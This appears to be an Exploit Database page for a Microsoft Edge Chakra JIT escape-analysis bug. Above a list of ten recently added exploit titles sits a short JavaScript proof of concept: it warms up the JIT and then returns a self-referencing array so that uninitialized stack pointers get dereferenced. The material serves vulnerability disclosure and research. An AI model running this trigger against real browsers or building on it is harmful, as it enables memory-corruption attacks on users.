ffa8e63e25
10 changes to exploits/shellcodes Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly call User-Defined JavaScript Functions Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches Microsoft Edge Chakra - 'asm.js' Out-of-Bounds Read Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure Android - Inter-Process munmap due to Race Condition in ashmem Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76_ QueryProcessEnergyValues)' Kernel Stack Memory Disclosure Microsoft Edge Chakra JIT - Escape Analysis Bug Microsoft Windows - Local XPS Print Spooler Sandbox Escape Commvault Communications Service (cvd) - Command Injection (Metasploit) osCommerce 2.2 - SQL Injection
23 lines
No EOL
456 B
JavaScript
23 lines
No EOL
456 B
JavaScript
/*
|
|
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis
|
|
|
|
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
function opt() {
|
|
let tmp = [];
|
|
tmp[0] = tmp;
|
|
return tmp[0];
|
|
}
|
|
|
|
function main() {
|
|
for (let i = 0; i < 0x1000; i++) {
|
|
opt();
|
|
}
|
|
|
|
print(opt()); // deref uninitialized stack pointers!
|
|
}
|
|
|
|
main(); |